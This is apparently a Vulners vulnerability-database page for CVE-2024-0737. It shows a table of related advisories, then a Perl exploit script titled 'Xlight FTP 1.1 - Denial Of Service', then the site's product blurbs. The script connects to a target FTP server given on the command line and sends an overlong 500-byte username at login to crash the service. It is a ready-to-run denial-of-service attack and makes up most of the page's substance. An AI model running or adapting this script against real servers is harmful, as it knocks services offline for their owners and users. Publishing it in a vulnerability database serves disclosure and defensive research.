| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| CVE-2024-0737 | 19 Jan 202423:21 | – | circl | |
| Xlight FTP Security Vulnerability | 19 Jan 202400:00 | – | cnnvd | |
| CVE-2024-0737 | 19 Jan 202421:31 | – | cve | |
| CVE-2024-0737 Xlightftpd Xlight FTP Server Login denial of service | 19 Jan 202421:31 | – | cvelist | |
| EUVD-2024-16526 | 3 Oct 202520:07 | – | euvd | |
| CVE-2024-0737 | 19 Jan 202422:15 | – | nvd | |
| CVE-2024-0737 | 19 Jan 202422:15 | – | osv | |
| 📄 Xlight FTP 1.1 Denial of Service | 28 Jul 202500:00 | – | packetstorm | |
| Design/Logic Flaw | 19 Jan 202422:15 | – | prion | |
| PT-2024-15794 · Unknown · Xlight Ftp Server | 19 Jan 202400:00 | – | ptsecurity |
# Exploit Title: Xlight FTP 1.1 - Denial Of Service (DOS)
# Google Dork: N/A
# Date: 22 July 2025
# Exploit Author: Fernando Mengali
# LinkedIn: https://www.linkedin.com/in/fernando-mengali/
# Vendor Homepage: https://www.xlightftpd.com
# Software Link: N/A
# Version: 1.1
# Tested on: Windows XP
# CVE: CVE-2024-0737
$sis="$^O";
if ($sis eq "windows"){
$cmd="cls";
} else {
$cmd="clear";
}
system("$cmd");
intro();
main();
print "[+] Exploiting... \n";
my $payload = "\x41"x500;
my $ftp = Net::FTP->new($ip, Debug => 0) or die "Não foi possível se conectar ao servidor: $@";
$ftp->login($payload,"anonymous") or die "[+] Possibly exploited!";
$ftp->quit;
print "[+] Done - Exploited success!!!!!\n\n";
sub intro {
print q {
,--,
_ ___/ /\|
,;'( )__, ) ~
// // '--;
' \ | ^
^ ^
[+] LightFTP 1.1 - Denial of Service (DoS)
[*] Coded by Fernando Mengali
[@] e-mail: [email protected]
}
}
sub main {
our ($ip, $port) = @ARGV;
unless (defined($ip) && defined($port)) {
print " \nUsage: $0 <ip> <port> \n";
exit(-1);
}
}Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation